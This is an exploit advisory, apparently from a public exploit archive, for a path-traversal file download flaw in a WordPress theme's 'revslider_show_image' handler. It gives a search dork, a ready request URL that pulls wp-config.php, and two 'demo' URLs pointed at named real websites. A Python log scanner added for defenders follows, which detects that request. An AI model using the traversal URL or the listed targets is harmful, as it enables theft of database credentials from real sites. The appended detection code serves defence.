WordPress theme soulmedic Arbitrary File Download Vulnerability

Author: KaMraN-Injector, Published: 02-01-2015
##############################################################
# Exploit Title: WordPress theme soulmedic Arbitrary File Download Vulnerability
#
# Exploit Author: KaMraN-Injector
#
# Discovered By: injector
#
# Dork 1: inurl:"/wp-content/themes/soulmedic/
#
# Date: 2 January 2015
#
# Tested on: Kali, Win7
#
# Category: webapps
#
# Theme link: http://themeforest.net/item/soulmedic-flat-responsive-medical-health-theme/6282832
#
# platform: php
##############################################################
VULNERABILITY
##############

[~] http://www.Site.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


##############

demo 1: http://www.ec3health.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

demo 2: http://www.allcarefamilyservices.org/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

##############################################################
Contact number: +1 647 69 64 247
Contact mail: injector@rogers.com
official Website: Http://acc3ss.ir/

##############################################################
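
Added example for defenders, not part of the original advisory: a Python scan of web server access logs for the request shown above (`admin-ajax.php` with `action=revslider_show_image`) where the `img` parameter is anything other than a plain image path. The combined log format, the image extension list and the sample log entries are assumptions constructed for this example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Combined-log-format prefix: client, request target, status code (assumed format).
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" (\d{3})')
IMAGE_EXT = (".jpg", ".jpeg", ".png", ".gif", ".bmp", ".webp")

def classify_img(value):
    """Return why an img value is not a plain image path, or None if it is."""
    for _ in range(3):  # peel any percent-encoding still left after query parsing
        value = unquote(value)
    path = value.replace("\\", "/").lower()
    if ".." in path.split("/"):
        return "path traversal"
    if path.startswith("/"):
        return "absolute path"
    if not path.endswith(IMAGE_EXT):
        return "non-image extension"
    return None

def scan(lines):
    """Flag revslider_show_image requests whose img parameter is suspicious."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith("/wp-admin/admin-ajax.php"):
            continue
        params = parse_qs(url.query, keep_blank_values=True)
        if "revslider_show_image" not in params.get("action", []):
            continue
        for img in params.get("img", []):
            reason = classify_img(img)
            if reason:
                findings.append((client, img, reason, int(status)))
    return findings

# Constructed sample entries (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [02/Jan/2015:10:11:12 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 200 3120',
    '203.0.113.7 - - [02/Jan/2015:10:11:15 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=%2e%2e%2fwp-config.php HTTP/1.1" 403 199',
    '198.51.100.23 - - [02/Jan/2015:10:12:01 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=uploads/2014/12/slide1.jpg HTTP/1.1" 200 48211',
]
print(scan(SAMPLE_LOG))
```

A flagged entry with status 200 means the file was likely served, so the database credentials and keys in `wp-config.php` should be treated as exposed and rotated.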